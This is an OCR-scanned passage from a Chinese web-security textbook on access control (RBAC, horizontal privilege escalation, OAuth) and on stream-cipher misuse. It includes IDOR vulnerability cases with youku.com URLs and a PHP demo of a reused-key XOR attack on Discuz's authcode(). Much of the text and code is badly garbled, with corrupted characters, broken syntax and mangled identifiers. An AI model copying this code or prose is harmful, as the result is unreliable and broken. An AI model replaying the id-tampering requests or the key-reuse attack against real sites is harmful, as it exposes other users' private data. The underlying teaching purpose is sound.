manager portal.do access-"ROLE MANAGER" /» 
a ept-url pattern="/**" 

> 


不 同 的 URL 对 于 能 访问 其 的 角色 有 着 不 同 的 要 求 。 
Spring Security 还 文 持 “基于 表达 式 的 访问 控制 ”这 使 得 访问 控制 的 方 
法 更 加 有 灵活。 


access-"hasRole('admin') and 
public List«Contact» getAll(); 


虽然 Spring Security 的 权限 管理 功能 非常 强大 ， 但 它 缺 乏 一 个 管理 界面 
可 供用 户 灵 活 配 置 ， 因 此 每 次 调整 权限 时 ， 都 需要 重新 修改 配置 文件 
或 代码 。 而 其 配置 文件 较为 复杂 ， 学 习 成 本 较 高 ， 维 护 成 本 也 很 高 。 
除了 Spring Security 外 ， 在 PHP 的 流行 框架 “Zend Framework” 中 ， 使 用 
的 Zend ACL 实 现 了 一 些 基础 的 权限 管理 。 

不 同 于 Spring Security 使 用 配置 文件 管理 权限 ，Zend ACL 提 供 的 是 API 
级 的 权限 框架 。 其 实现 方式 如 下 : 


ew Zend Ac 
-»addRole(new Zend Ac 
new Zend Ac 

uest', 

end Ac 
someRe 


( 
- ole('admin')); 
$parents - array( t^ mber', 'admin' 
$acl->addRole(new (C 
nts); 


Zend Acl Resource(' source')); 
1 


权限 管理 其 实 是 业务 需求 上 的 一 个 问题 ， 需 要 根据 业务 的 不 同 需求 来 
实现 不 同 的 权限 管理 。 因 此 很 多 时 候 ， 系 统 都 需要 目 己 定制 权限 管 
理 。 和 定制 一 个 简单 的 权限 管理 系统 ， 不 妨 选择 RBAC 模 型 作为 依据 。 
a ONBRDUN UE (RBAC 模 型 ) ， 我 们 可 以 称 之 为 “垂直 权限 
管理 ”。 


不 同 角 色 的 权限 有 高 低 之 分 。 高 权限 角色 访问 低 权限 角色 的 资源 往往 
征 被 允许 的 ， 而 低 权 限 角 色 访 问 高 权限 角色 的 资源 往往 则 被 栓 止 。 如 
林 一 个 本 属于 低 权 限 角 色 的 用 户 通过 一 些 方法 能 够 获得 高 权限 角色 的 
能 力 ， 则 发 生 了 “越权 访问 ”。 

在 配置 权限 时 ， 应 当 使 用 “最 小 权限 原则 ”， 并 使 用 “默认 拒绝 ”的 筑 
略 ， 只 对 有 需要 的 主体 单独 配置 “允许 ”的 策略 。 这 在 很 多 时 候 能 够 避 
免 发 生 *“ 越 权 访问 ”。 


10.3 ”水 平权 限 管理 

在 上 节 中 提 到 权限 管理 其 实 是 一 个 业务 需求 ， 而 业务 是 灵活 多 变 的 ， 
eee 答案 是 否定 的 。 我 们 看 几 个 真实 的 
E 

优酷 网 用 户 越权 访问 问题 (漏洞 编号 wooyun-2010-0129) 

用 户 登 录 后 ， 可 以 通过 以 下 方式 查看 他 人 的 来 往 信件 (只 要 更 改 下 面 
地 址 的 数字 id 即 可 ) ， 查 看 和 修改 他 人 的 专辑 信息 。 


http://u.youku.com/my mail/ 

type read ref inbox id 52379500 desc 1? 
. rt-1& ro-myInboxList 
http://u.youku.com/my mail/ 

type read ref outbox id 52380790 desc 1? 
. rt-1& ro-myOutboxList 
http://u.youku.com/my video/ 

type editfolder step 1 id 4774704? 


漏洞 分 析 : URL 经 过 rewrite 后 将 参数 映射 成 URL 路 径 ， 但 这 并 不 妨碍 通 
过 修改 用 户 id 来 实现 攻击 。 在 这 里 ，id 代 表 资 源 的 唯一 编号 ， 因 此 通过 
自 改 id， 束 能 改变 要 访问 的 资源 。 而 优酷 网 显然 没有 检查 这 些 资 源 是 否 
属于 当前 用 户 。 

来 伊 份 购物 网 站 越权 访问 问题 (漏洞 编号 wooyun-2010-01576) 

来 伊 份 购物 网 站 没有 对 用 户 进行 权限 控制 ， 通 过 变化 URL 中 的 id 参数 即 
可 查看 对 应 id 的 个 人 姓名 、 地 址 等 隐私 信息 © 


root(w om/ 


f 


获取 他 人 敏感 信息 的 请 求 过 程 
漏洞 分 析 : 同样 的 ，id 是 用 户 的 唯一 标识 ， 修 改 id 即 可 修改 访问 的 目 
标 。 网 站 后 台 应 用 并 未 判断 资源 是 否 属于 当前 用 户 。 
从 这 两 个 例子 中 我 们 可 以 看 到 ， 用 户 访 问 了 原本 不 属于 他 的 数据 。 用 
户 A 与 用 户 B 可 能 都 属于 同一 个 角色 RoleX， 但 是 用 户 A 与 用 户 B 都 各 自 
拥有 一 些 私 有 数据 ， 在 正常 情况 下 ， 应 该 只 有 用 户 自 己 才 能 访问 自己 
的 私有 数据 。 
但 是 在 RBAC 这 种 “基于 角色 的 访问 控制 ?模型 下 ， 系 统 只 会 验证 用 户 A 
是 否 属于 角色 RoleX， 而 不 会 判断 用 户 A 是 否 能 访问 只 属于 用 户 B 的 数 
因此 ， 发 生 了 越权 访问 。 这 种 问题 ， 我 们 就 称 之 为 “水 平权 
管理 问题 ”。 


水 平权 限 管理 问题 示意 图 

相对 于 垂直 权限 管理 来 说 ， 水 平权 限 问题 出 在 同一 个 角色 上 “。 系 统 只 
难 证 了 能 访问 数据 的 角色 ， 既 没有 对 角色 内 的 用 户 做 细 分 ， 也 没有 对 
数据 的 子 集 做 细 分 ， 因 此 缺乏 一 个 用 户 到 数据 之 间 的 对 应 关系 。 由 于 
水 平权 限 管理 是 系统 缺乏 一 个 数据 级 的 访问 控制 所 造成 的 ， 因 此 水 平 
权限 管理 又 可 以 称 之 为 “基于 数据 的 访问 控制 ”。 

在 今天 的 互联 网 中 ， 垂 直 权 限 问 题 已 经 得 到 了 普 遇 的 重视 ， 并 已 经 有 
了 很 多 成 熟 的 解决 方案 。 但 水 乎 权限 问 题 却 尚未 得 到 重视 。 

首先 ， 对 于 一 个 大 型 的 复杂 系统 来 说 ， 难 以 通过 扫 摘 等 有 目 动 化 测试 方 
法 将 这 些 问题 全 部 找 出 来 。 

其 次 ， 对 于 数据 的 访问 控制 ， 与 业务 结合 得 十 分 紧 冤 。 有 的 业务 有 数 
据 级 访问 控制 的 需求 ， 有 的 业务 则 没有 。 要 理 清楚 不 同业 务 的 不 同和 需 
求 ， 也 不 是 件 容易 的 事情 。 

最 后 ， 如 采 在 系统 已 经 上 线 后 再 来 处 理 数据 级 访问 控制 问题 ， 则 可 能 
会 涉及 跨 表 、 跨 库 查 询 ， 对 系统 的 改动 较 大 ， 同 时 也 可 能 会 影响 到 性 


Sh 
HE ° 


这 种 种 原因 导致 了 现在 数据 级 权限 管理 并 没有 很 通用 的 解决 方案 ， 一 
骸 是 具体 问题 具体 解决 。 一 个 简单 的 数据 级 访问 控制 ， 可 以 考虑 使 
用 “用 户 组 (Group) ”的 概念 。 比 如 一 个 用 户 组 的 数据 只 属于 该 组 内 的 
成 员 ， 只 有 同一 用 户 组 的 成 员 才 能 实现 对 这 些 数据 的 操作 。 

此 外 ， 还 可 以 考虑 实现 一 个 规则 引擎 ， 将 访问 控制 的 规则 写 在 配置 文 
件 中 ， 通 过 规则 引擎 对 数据 的 访问 进行 控制 。 

水 平权 限 管理 问题 ， 至 今 仍然 是 一 个 难题 一 一 它 难 以 有 发现， 难以 在 统 
一 框架 下 解决 ， 在 未 来 也 许 会 有 新 的 技术 用 以 解决 此 类 问题 。 


10.4 OAuth 简介 
OAuth 是 一 个 在 不 提供 用 户 名 和 密码 的 情况 下 ， 授 权 第 三 方 应 用 访问 
Web 资 源 的 安全 协议 。OAuth 1.0 于 2007 年 12 月 公布 ， 并 迅速 成 为 了 行 
业 标 准 (可 见 不 同 网 站 之 间 互 通 的 需求 有 多 么 的 迫切 ) 。2010 年 4 月 ， 
OAuth 1.0 正 式 成 为 了 RFC5849 ° 
OAuth 与 OpenID 都 致力 于 让 互联 网 变 得 更 加 的 开放 。OpenID 解 决 鸭 是 
认证 问题 ，OAuth 则 更 注重 授权 。 认 证 与 授权 的 关系 其 实 是 一 脉 相 承 
的 ， 后 来 人 们 发 现 ， 其 实 更 多 的 时 候 真 正 需要 的 是 对 资源 的 授权 。 
OAuth 委 员 会 实际 上 是 从 OpenID 委 员 会 中 分 离 出 来 的 (2006 年 12 
H) ，OAuth 的 设计 原本 想 弥 补 OpenID 中 的 一 些 缺 陷 或 者 说 不 够 方便 
的 地 方 ， 但 后 来 发 现 需要 设计 一 个 全 新 的 协议 。 

We want something like Flickr Auth / Google AuthSub / Yahoo! BBAuth, but published as an 

open standard, with common server and client libraries, etc. The trick with OpenID is that the 

users no longer have passwords, so you can't use basic auth for API calls without requiring 


passwords (defeating one ofthe main points of OpenID) or giving cut-and-paste tokens (which 

suck). 

— Blaine Cook, April 5th, 2007 
OAuth 产 生 的 背景 
常见 的 应 用 OAuth 的 场景 ， 一 般 是 某 个 网 站 想 要 获取 一 个 用 户 在 第 三 方 
网 站 中 的 某 些 资源 或 服务 。 
比如 在 人 人 网 上 ， 想 要 导入 用 户 MSN 里 的 好 友 ， 在 没有 OAuth 时 ， 可 
能 需要 用 户 向 人 人 网 提供 MSN 用 户 名 和 密码 。 


~ 查找 你 的 MSN 联系 人 中 有 谁 在 人 人 网 上 


MSN 帐号 : 


— 人 人 网 不 会 记录 你 的 密码 ， 请 放心 使 用 。 
Msn: 你 也 可 以 先 改 密码 再 导入 ， 成 功 后 再 改 为 原 密码 ， 保 证 帐号 安全 。 


查找 不 的 MSN 联系 人 中 有 谁 在 人 大 网 上 


人 人 网 要 求 用 户 输入 MSN 密码 

这 种 做 法 使 得 人 人 网 会 挂 有 用 户 的 MSN 账 户 和 和 密码， 虽然 人 人 网 承诺 

oe 但 这 其 实 扩大 了 攻击 面 ， 用 户 也 难以 无 条 件 地 信 
XX} o 


而 OAuth 则 解决 了 这 个 信任 的 问题 ， 它 使 得 用 户 在 不 需要 向 人 人 网 提供 

户 名 和 密码 的 情况 下 ， 可 以 授权 MSN 将 用 户 的 好 友 名 单 提供 给 
XX} o 

在 OAuth 1.0 中 ， 涉 及 3 个 角色 ， 分 别 是 : 


。 Consumer: 消费 方 (Client) 
。 Service Provider: 服务 提供 方 (Server) 
e User: 用 户 (Resource Owner) 


在 新 版 本 的 OAuth 中 ， 又 被 称 为 Client、Server、Resource Owner ° E 
面 的 例子 中 ，Client 是 人 人 网 ，S$Server 是 MSN Resource Owner 是 用 
户 o 
我 们 再 来 看 一 个 实际 场景 。 假设 Jane 在 fajicom 上 有 两 张 照 片 ， 她 想 将 
这 两 张 照片 分 享 到 beppa.com， 通 过 OAuth， 这 个 过 程 是 如 何 实 现 的 
呢 ? 


区 er lend 


在 beppa.com 后 台 ， 则 会 创建 一 个 临时 凭证 (Temporary Credentials) , 
稍 后 Jane 将 持 此 临时 凭证 前 往 fajicom。 


4*4. Dicom 
p. 
/ 
4 
Get 


然后 页 面 跳 转 到 fajicom 的 OAuth 页 面 ， 并 要 求 Jane 登 录 。 注 意 ， 这 里 是 
在 faji.com 上 登录 ! 


Spa oon n 
(f pae yen iyoy deme qe zay j 
lé-»9-CO0d2. j ne jy comonathimarcese + ie) 


登录 成 功 后 ，fajicom 会 询问 Jane 是 否 授权 beppa.com 访 问 Jane 在 fajicom 
里 的 私有 照片。 


Nae T cn at 
(fe (de yen Pepe qnem qe tip 9| 
lo-)- 804 Mapa Map comeasmeorim ie)” 


beppa com n requesting access 10 your 
prvate proto albums 


beppa ” 
approved. begpa com mi have read 
ph mee rper to 
[E IL | 


如 果 Jane 授 权 成 功 (点 击 “Approve” 按 钮 )” ，faji.com 会 将 Jane 带 来 的 临 
时 凭证 (Temporary Credentials) 标记 为 “Jane 已 经 授权 ”， 同 时 跳 转 回 
beppa.com , J F [mH SE WE (Temporary Cre-dentials) ° 4% I, 
beppa.com 知 道 它 可 以 去 获取 Jane 的 私有 照片 了 。 


euet u. 
(fe (de yom repe Romam De sip 
ESTEN Meng serge com mde, 


XJ T beppa.com?€ Ut, E Bi 76 iH 3X RequestToken Æ faji.com 1& BL Access 
Token, Ja Ln] LA Fi Access Token ii |] {Vk T ° Request Token H fé H 
于 获取 用 户 的 授权 ，Access Token 才 能 用 于 访问 用 户 的 资源 。 


faji.com 


beppa.com 
最 终 ，Jane 成 功 地 将 她 的 照片 从 fajicom 分 享 到 beppa.com 上。 


描述 的 过 程 是 一 样 的 。 新 当 微 博 的 OAuth 使 用 过 程 


你 的 应 用 gg DRFA R^ 


获取 Request Token 创建 Request Token 及 
oautl/request token 相应 的 密 钥 (Secret) 


将 用 户 重 定向 到 授权 页 
http://api.tsina.com.cn/oauth 询问 用 户 是 否 对 应 用 授权 
authorize?oauth token-toker 


如 果 用 户 同意 授权 ， 则 重 定 
5] 48 Callback url. (你 的 应 用 ) 


创建 并 返回 
Access Token 及 Secret 


用 户 授权 或 者 拒绝 授权 


oautl/access token 


博 换 取 Access Token 


account/verify credentials 


取 该 Access Token 的 信息 返回 该 Token 的 信 i 
及 对 应 用 户 的 信息 及 对 应 用 户 的 信息 


Ch 


OAuth 的 发 展 道路 并 非 一 帆 风 顺 ，OAuth 1.0 也 曾经 出 现 过 一 些 漏洞 ， 
因此 OAuth 也 出 过 几 个 修订 版 本 ， 最 终 才 在 2010 年 4 月 定稿 OAuth 1.0 为 
RFC 5849， 在 这 个 版 本 中 ， 修 复 了 所 有 已 知 的 安全 问题 ， 并 对 实现 
OAuth 协 议 需 要 考虑 的 安全 因素 给 出 了 建议 。OAuth 标 准 中 的 安全 建议 


H- lt OON e JE XUI GELS an wate jore qz nape RENE i ai 
4. 1. :RSA-SHAI S51gnature: et asaayan oin m mim minim mim m pim] mim im mm mmm nom 29 
4.2. Confidentiality of Requests ........ Wieesiss eaae E a ecard ol 
dd Sspoofing by Counterfeit Servers... peor eaa ard a wo pe In] 
4.4. Proxying and Caching of Authenticated Content ............. 30 
S be Plaintext-5toragesot Credemntislsszzu x IER REIR S EAD 
4.8. Secrecv-of the-bclient.Credentials ...5..- x xe rx nn nm Rn 3l 
A o. Phishing ACE AC Bs ay usrvacceeet uui tw ance y iu a tra Ro aJ 78 TC MERTZ T t Ea D 
a eO LE or E SS A a opaa a nummos) eS EP 
4.9. Entropy of Secrets ....... NER SISTEMI DEN .d2 
4.10. Denial-of-Service / Resource-Exhaustion Attacks ..........32 
4:11. SHA-I-Cryptographic/AttacEs sirere toenamen ea pucr aida ia ura a esate 33 
4.12. S1enature-Base^5tring- Limitations... 20 a eri 
4.13. Cross-Site Request Forgery (CSRF) ........... eee eee hn 33 
2.190. Jlsgr-Interfacé .i x Re De a TR e Dae tea e e Td Ro ERG 
4.15. Automatic Processing of Repeat Authorizations ............ 34 


事实 上 ， 目 己 完 全 实现 一 个 OAuth 协 议 对 于 中 小 网 站 来 说 并 没有 太 多 的 
必要 ， 且 OAnuth 涉 及 诸多 加 密 算 法 、 伪 随机 数 算 法 等 容易 被 程序 员 误 用 
的 地 方 ， 因 此 使 用 第 三 方 实现 的 OAuth 库 也 是 一 个 较 好 的 选择 。 目 前 有 
以 下 这 些 比 较 知名 的 OAuth 库 可 供 开 发 者 选择 : 


ActionScript/Flash 

oauth-as3 http://code.google.com/p/oauth-as3/ 
A flex oauth 

client http://www.arcgis.com/home/item.html? 
id=ff6ffa302ad04a7194999f 2ad08250d7 

C/C++ 

QTweetLib http://github.com/minimoog/ 
QTweetLib 

libOoAuth http://liboauth.sourceforge.net/ 
clojure 
clj-oauth http://github.com/mattrepl/clj- 
oauth 
.net 
oauth-dot-net http://code.google.com/p/oauth- 
dot-net/ 
DotNetOpenAuth http://www.dotnetopenauth.net/ 
Erlang 
erlang-oauth http://github.com/tim/erlang- 
oauth 
Java 
Scrible http://github.com/fernandezpablo85/ 
scribe-java 
oauth-signpost http://code.google.com/p/ 
oauth-signpost/ 

JavaScript 

oauth in js http://oauth.googlecode.com/svn/ 
code/javascript/ 

Objective-C/Cocoa & iPhone programming 
OAuthCore http://bitbucket.org/atebits/ 
oauthcore 
MPOAuthConnection http://code.google.com/p/ 
mpoauthconnection/ 

Objective-C OAuth 
http://oauth.googlecode.com/svn/code/0obj-c/ 
Per 
Net::OAuth http://oauth.googlecode.com/svn/ 
code/perl/ 
PHP 
tmhOAuth http://github.com/themattharris/ 
tmhOAuth 
oauth-php http://code.google.com/p/oauth-php/ 
Python 
python-oauth2 http://github.com/brosner/ 
python-oauth2 

Qt 

qOauth http://github.com/ayoy/qoauth 

Ruby 

Oauth ruby gem http://oauth.rubyforge.org/ 
Scala 

DataBinder Dispatch 
http://dispatch.databinder.net/About 


OAuth 1.0 已 经 成 为 了 RFC 标 准 ， 但 OAuth2.0 仍 然 在 紧锣密鼓 的 制定 
中 ， 到 2011 年 年 底 已 经 有 了 一 个 较为 稳定 的 版 本 。 


OAuth 2.0 吸 收 了 OAnuth 1.0 的 经 验 ， 做 出 了 很 多 调整 。 它 大 大 地 简化 了 
流程 ， 改 善 了 用 户 体验 。 两 者 并 不 兼容 ， 但 从 流程 上 看 区 别 不 大 。 
常见 的 需要 用 到 OAuth 的 地 方 有 桌面 应 用 、 手 机 设备 、Web 应 用 ， 但 
OAuth 1.0 只 提供 了 统一 的 接口 。 这 个 接口 对 于 Web 应 用 来 说 尚 可 使 
用 ， 但 手机 设备 和 桌面 应 用 用 起 来 则 会 有 些 别 扭 。 同 时 OAuth 1.0 的 应 
用 架构 在 扩展 性 方面 也 存在 一 些 问题 ， 当 用 户 请 求 数 庞大 时 ， 可 能 会 
过 到 一 些 性 能 瓶 贷 。 为 了 改变 这 些 问 题 ，OAuth 2.0 应 运 而 生 。 


10.5 小结 

在 本 章 中 ， 介 绍 了 安全 系统 中 的 核心 : 访问 控制 。 访 问 控 制 解决 
了 “What an 的 问题 。 

还 分 别 介 绍 了 “垂直 权限 管理 ”>， 它 是 一 种 “基于 角色 的 访问 控制 >;， 以 
a 水 平权 限 管理 > 它 是 一 种 “基于 数据 的 访问 控制 ” ,这 两 种 访问 控 
制 方式 ， 在 进行 安全 设计 时 会 d$ FH Bl o 

Dy lal $s Bil SS KAR, JRJE— TORAEHJZE Aq. AE 
决 此 类 问题 或 者 设计 权限 控制 方案 时 ， 要 重视 业务 的 意见 。 

最 后 ， 无 论 选 择 哪 种 访问 控制 方式 ， 在 设计 方案 时 都 应 该 满足 “最 小 权 
限 原则 >， 这 是 权限 管理 的 黄金 法 则 。 


第 11 章 ”加 密 算法 与 随机 数 


加 密 算 法 与 伪 随 机 数 算 法 是 开发 中 经 常会 用 到 的 东西 ， 但 加 密 算 法 的 
专业 性 非常 强 ， 在 Web 开 发 中 ， 如 有 果 对 加 蜜 算法 和 伪 随 机 数 算法 缺乏 
一 定 的 了 解 ， 则 很 可 能 会 错误 地 使 用 它们 ， 最 终 导 致 应 用 出 现 安 全 问 
题 。 本 章 将 束 一 些 和 并 见 的 问题 进行 探讨 。 


11.1 概述 
密码 学 有 着 悠久 的 历史 ， 它 满足 了 人 们 对 安全 的 最 基本 需求 一 一 保 
性 。 密 码 学 可 以 说 是 安全 领域 发 展 的 基础 。 


ER 


达 分 奇 密码 简 
在 Web 应 用 中 ， 篆 和 可 以 见 到 加 密 算 法 的 身影， 最 筑 见 的 束 是 网 站 在 将 


敏感 信息 保存 到 Cookie 时 使 用 的 加 密 算 法 。 加 密 算法 的 运用 是 否 正 
H, SVEN ERA © 
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的 实现 原理 不 同 。 

分 组 加 密 算法 基于 “分 组 ”(block) 进行 操作 ， 根 据 算法 的 不 同 ， 每 个 
分 组 的 长 度 可 能 不 同 。 分 组 加 密 算 法 的 代表 有 DES、3-DES ^ 
Blowfish、IDEA、AES 等 。 下 图 演示 了 一 个 使 用 CBC 模 式 的 分 组 加 密 
算法 的 加 密 过 程 。 


Plaintext Plaintext Plaintext 
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Ciphertext Ciphertext Ciphertext 
流 密码 加 密 算 法 ， 则 每 次 只 处 理 一 个 字 节 ， 密 钥 独 立 于 消息 之 外 ， 两 
阁 通 过 腊 或 实现 加 密 与 解密 。 流 密码 加 密 算法 的 代表 有 RC4、ORYX、 
SEAL 等 。 下 图 演示 了 流 密码 加 密 算法 的 加 密 过 程 。 


Key 
Scheduler 


Plaintext 


Ciphertext 
Keystream 


针对 加 密 算 法 的 攻击 ， 一 般 根 据 攻击 者 能 获得 的 信息 ， 可 以 分 为 : 
唯 密 文 攻击 

攻击 者 有 一 些 密 文 ， 它们 是 使 用 同一 加 密 算法 和 同一 密 角 加密 的 。 这 
种 攻击 是 最 难 的 。 

已 知 明文 攻击 

攻击 者 除了 能 得 到 一 些 密 文 外 ， 还 能 得 到 这 些 密 文 对 应 的 明文 本章 
中 针对 流 密码 的 一 些 攻击 为 已 知 明 文 攻击 。 

选择 明文 攻击 

攻击 者 不 仅 能 得 到 一 些 密 文 和 明文 ， 还 能 选择 用 于 加 密 的 明文 。 
选择 密 文 攻击 

攻击 者 可 以 选择 不 同 的 密 文 来 解密 。 本 章 中 所 提 到 的 “Padding Oracle 
Attack” 就 是 一 种 选择 密 文 攻击 。 

密码 学 在 整个 安全 领域 中 是 非常 大 的 一 个 课题 ， 本 书 中 仪 探讨 几 种 常 
见 的 加 密 算法 在 运用 时 的 安全 问题 。 


11.2 Stream Cipher Attack 


流 密 码 是 利用 的 一 种 加 密 算 法 ， 与 分 组 加 密 算 法 不 同 ， 流 密码 的 加 密 
是 基于 异 或 (XOR) 操作 进行 的 ， 每 次 都 只 操作 一 个 字 节 。 但 流 密码 
加 密 算 法 的 性 能 非常 好 ， 因 此 也 是 非常 受 开发 者 欢迎 的 一 种 加 密 算 
法 。 常 见 的 流 密 码 加 密 算 法 有 RC4、ORYX、SEAL 等 。 


11.2.1 Reused Key Attack 

在 流 密 码 的 使 用 中 ， 最 常见 的 错误 便 是 使 用 同一 个 密 钥 进行 多 次 加 / 解 
蜜 。 这 将 使 得 破解 流 密码 变 得 非常 简单 。 这 种 攻击 被 称 为 "Reused Key 
At-tack”， 在 这 种 攻击 下 ， 攻 击 者 不 需要 知道 密 钥 ， 即 可 还 原 出 明文 。 
假设 有 密 钥 C， 明 文 A， 明 文 B， 那 么 ，XOR 加 密 可 表示 为 : 


E(A) = A xor C 
E(B) = B xor C 


密 文 是 公之于众 的 ， 因 此 很 容易 吏 可 计算 : 


E(A) xor E(B) 


因为 两 个 相同 的 数 进 行 XOR 运 算 结果 为 0， 由 此 可 得 : 


E(A) xor E(B) = (A xor C) xor (B xor C) = A 
r B xor C xor C =A xor B 


从 而 得 到 了 : 


E(A) xor E(B) = A xor B 


这 意味 着 4 个 数据 中 ， 只 需要 知道 3 个 ， 就 可 以 推导 出 剩 下 的 一 个 。 这 
个 公式 中 密 钥 C 在 哪里 ? 已 经 完全 不 需要 了 ! 
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数 名 为 authcode0) , 一 个 典型 的 流 密 码 加 密 算 法 。 这 个 函数 在 
Discu2l 的 产品 中 被 广泛 使 用 ， 同时 很 多 PHP 开 源 程序 也 直接 引用 此 画 
数 ， 甚 至 还 有 开发 者 实现 了 auth-code0) 函 数 的 Java、Ruby 版 本 。 对 这 个 
函数 的 分 析 如 下 : 


// $string: 明文 或 密 文 

// $operation: DECODE 委 示 解 密 ， 其 他 表示 加 密 
// $key: ub 

// Sexpiry: 密 文 有 效 其 

// 字 符 串 解密 /加 密 

function BUR Le A a = 


‘ORODES, a zr 9) { 
BARAK ry "UE Leti 不 同 密 
xut ae prd k (初始 化 向 量 
$ckey length = 4; — // PUT BE 取 值 


0~32 
/ 加 入 随机 密 钥 ， 可 以 令 密 文 无 
reum a so ee ek 同 ， 加 密 结果 


也 会 每 
// 增 大 破解 难度 (实际 上 就 是 


IV) 

// 取 值 越 大 ， MR 
大 ， 密 文 变化 = 16 的 $ckey lengt 

// 当 此 值 为 9 f. 由 不 产生 随 
机 密 钥 


// BR 

$key = md5($key ? $key : UC KEY); 
// 人 

$keya = md5(substr ($ke y, 0, 16)); 
// * pba 用 来 做 数据 完整 性 验证 

$keyb = md5(substr($key, 16, 16)); 
// Mic OTA Cte 化 向 量 IV) 


$keyc = $ckey length ? ($operation == 
'DECODE' ? substr($string, 0, $ckey length) 
: substr(md5(microtime()), -$ckey length)) : 

// 参与 运算 的 密 匙 

$cryptkey = $keya.md5($keya.$keyc); 

$key_length = strlen($cryptkey); 

// 明文 ， 前 19 位 用 来 保存 时 间 戳 ， 解 密 时 验证 
数据 有 效 性 ，16 到 26 位 用 来 保存 $keyb( 密 匙 b) 

// 解 密 时 会 通过 这 个 密 匙 验证 数据 完整 性 

// 如 果 是 解码 的 话 ， 会 从 第 $ckey_length 位 开 
始 ， 因 为 密 文 前 $ckey_length 位 保存 动态 密 匙 
// 以 保证 解密 正确 
$string = $operation == 'DECODE' ? 
base64_decode(substr($string, 
$ckey_length)) : sp 
rintf('%010d', $expiry ? $expiry + time() : 
©).substr(md5($string.$keyb), ©, 16).$string; 

$string_length = strlen($string); 

$result = ''; 

$box = range(0, 255); 

$rndkey = array(); 

// FERRE 

for($i = 0; $i <= 255; $i++) { 
rndkey[$i] = ord($cryptkey[$i % 
$key length]); 

3 


定 的 算法 ， 打 乱 密 匙 短 ， 增 加 随机 
实际 上 并 不 会 增加 密 文 的 强度 


M 
X 
[ng] 


性 ， 好 像 很 复 


mE 


for($j = $i = 0; $i « 256; $i++) { 
j = ($j + $box[$i] + $rndkey[$i]) * 
256; 
tmp = $box[$i]; 
box[$i] = $box[$j]; 
box[$j] = $tmp; 
l 


// 核心 加 /解密 部 分 

for($a = $j = $i = 0; $i < 
$string length; $i++) { 
a - ($a + 1) % 256; 
j = ($j + $box[$a]) % 256; 
tmp - $box[$a]; 
box[$a] = $box[$j]; 
box[$j] = $tmp; 
// 从 密 匙 短 得 出 密 匙 进行 异 或 ， 再 转 成 字 


符 


result .= chr(ord($string[$i]) ^ 
($box[($box[$a] + $box[$j]) % 256])); 


if($operation == 'DECODE') { 
// 验证 数据 有 效 性 ， 请 看 未 加 密 明 文 的 格 


if((substr($result, 0, 10) == 0 || 
substr($result, 0, 10) - time() > 0) && 
substr($result, 10, 16) == 
substr(md5(substr($result, 26).$keyb), 0, 


x 


16)) ( 
return substr($result, 26); 
} else { 
return ''; 
} 
} else { 


// 把 动态 密 匙 保存 在 密 文 里 ， 这 也 是 为 
SAIS S. 产生 不 同 密 文 后 能 解密 的 原 
因为 加 密 后 的 密 文 可 能 是 一 些 特殊 字 
TR, 复制 过 4 相生 能 会 天 所 以 用 base64 编 码 
return $keyc.str_replace('=', '', 
base64_encode($result) ); 


} 


Pa el eae: [AAW RRA, ASCE Be, MATEZ 
节 地 进行 XOR 运 算 ， 其 实现 XOR 加 密 过 程 的 代码 只 有 一 行 


$result .= chr(ord($string[$i]) ^ 
($box[($box[$a] + $box[$j]) % 256])); 


再 注意 其 他 几 个 细节 。 首 先 ， 外 部 传 入 的 加 密 KEY， 其 值 会 经 过 MD5 
运算 ， 因 此 长 度 是 固定 的 32 位 。 


function authcode($string, $operation = 
'DECODE', $key = '', $expiry = 0) { 
$ckey_length = 4; 
$key = md5($key ? $key : UC_KEY); 
$keya = md5(substr($key, 0, 16)); 
$keyb = md5(substr($key, 16, 16)); 


authcodeO 这 个 函数 的 常见 调用 方式 为 : 


authcode($plaintext, "ENCODE" , UC KEY) 


其 中 ，UC_KEY 为 配置 在 每 个 应 用 中 的 密 钥 ， 但 这 个 密 钥 并 非 真 正 用 
于 XOR 运 算 的 那个 密 钥 o 


其 次 ，keyc 是 初始 化 向 量 (IV) 。 如 果 定 义 了 ckey_length， 则 它 会 根据 
microtime() 的 结 采 生成 ， 并 随后 会 影响 到 随机 密 钥 的 生成 。 


ckey_length = 4; 

$keyc = $ckey_length ? ($operation == 
'DECODE' ? substr($string, 0, $ckey_length): 
substr(md5(microtime()), -$ckey_length)) : 


cryptkey = $keya.md5($keya.$keyc); 
key_length = strlen($cryptkey); 
string = $operation == 'DECODE' ? 
base64_decode(substr($string, 
$ckey_length)) : 
sprintf('%010d', $expiry ? $expiry + 
time() : 0).substr(md5($string.$keyb), 0, 
16).$string; 


rndkey = array(); 
for($i = 0; $i <= 255; $i++) f 
$rndkey[ 3]: ord($cryptkey[$i 96 
$key length]); 
3 


初始 化 回 量 的 作用 怠 是 一 次 一 密 。 使 用 随机 的 初始 化 回 量 ， 明 文 每 次 
加 密 后 产生 的 密 文 都 是 不 同 的 ， 增 加 了 密 文 的 安全 性 。 但 初始 化 向 量 
本 身 并 不 需要 保证 其 私密 性 ， 其 至 为 了 密 文 接收 方 能 够 成 功 解密 ， 需 
要 将 初始 化 回 量 以 明文 的 形式 传播 。 

为 了 演示 Reused Key Attack， 和 暂且 将 ckey_lengh 设 置 为 0， 这 样 束 不 会 
有 和 初始 化 器 量 。 下 面 为 一 段 攻击 的 演示 代码 。 


<?ph 
define('UC KEY','aaaaaaaaaaaaaaaaaaaaaaaaaaa' 


$plaintexti - "aaaabbbb"; 
$plaintext2 - "ccccbbbb"; 


echo "plaintexti is: ".$plaintext1."<br>"; 
echo "plaintext2 is: ".$plaintext2."<br>"; 
$cipheri - 


base64 decode(substr(authcode($plaintexti, 
"ENCODE" , UC KEY), 0)); 
echo "Cipheri is: ".hex($cipher1).'<br><br>'; 
$cipher2 = 
base64 decode(substr(authcode($plaintext2, 
"ENCODE" , UC -KEY), 0)); 
echo "Cipher2 is: ".hex($cipher2).'<br><br>'; 
function hex($str){ 

$result = 

for ($i=0; $i<strlen($str); $i++){ 

$result .= "\\x" ord($str[$i]); 


return $result; 


echo "crack result is :".crack($plaintext1, 
$cipheri, $cipher2); 
function crack($plain, $cipher_p, $cipher_t){ 

$target = ' 

$len = strlen(Splain); 

$tmp p = substr($cipher p, 26); 

echo hex($tmp p)."«br»"; 

$tmp t = substr(S$cipher t, 26); 

echo hex($tmp_t)."<br>"; 

for ($i-0;$i«strlen($plain);$i-*)[ 

$target .= chr(ord($plain[$i]) ^ 

ord($tmp p[$i]) ^ ord($tmp t[$i])); 


3 
return $target; 
} 
echo "crack result is :".crack($plaintext1, 
$cipheri, $cipher2); 
function crack($plain, $cipher p, $cipher_t){ 
$target - ''; 
$len - strlen(Splain); 
